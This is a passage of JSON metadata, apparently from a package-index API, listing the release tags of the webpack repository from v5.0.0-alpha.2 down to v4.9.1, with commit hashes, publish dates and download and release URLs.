"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe